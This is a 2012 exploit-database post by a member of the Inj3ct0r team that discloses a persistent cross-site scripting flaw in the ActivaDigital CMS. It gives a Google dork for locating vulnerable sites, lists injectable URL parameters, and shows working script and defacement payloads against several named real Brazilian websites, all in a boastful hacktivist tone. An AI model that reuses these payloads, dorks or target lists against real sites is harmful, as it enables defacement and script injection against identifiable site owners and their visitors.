Home / exploits ActivaDigital Cross Site Scripting
Posted on 04 April 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> ActivaDigital - Persistent XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 [ www.thecybernuxbie.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By ActivaDigital: http://www.activadigital.com.br/ - Google Dork: inurl:"/produtos.php?id_categoria=" - Exploit Concept: http://lokalisasi/produtos.php?id_categoria=[XSS] http://lokalisasi/servicos.php?id_servicos=[XSS] http://lokalisasi/empresas.php?id_empresa=[XSS] http://lokalisasi/servicos.php?id=[XSS] - Sample Web Persistent XSS Vulnerability: http://labsolutions.com.br/produtos.php?id_categoria=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS] http://itamaratiterraplenagem.com.br/servicos.php?id_servicos=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS] http://ferroviarios-sp.org.br/empresas.php?id_empresa=<script>alert(31337);</script> <:- [XSS] http://marispan.com.br/produtos.php?id_categoria=<script>alert(31337);</script> <:- [XSS] http://estilonox.com.br/produtos.php?id_categoria=<script>alert(31337);</script> <:- [XSS] http://avaco.com.br/produtos.php?id_categoria=<script>alert(31337);</script> <:- [XSS] http://netoscabeleireiros.com.br/servicos.php?id=<script>alert(31337);</script> <:- [XSS] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################
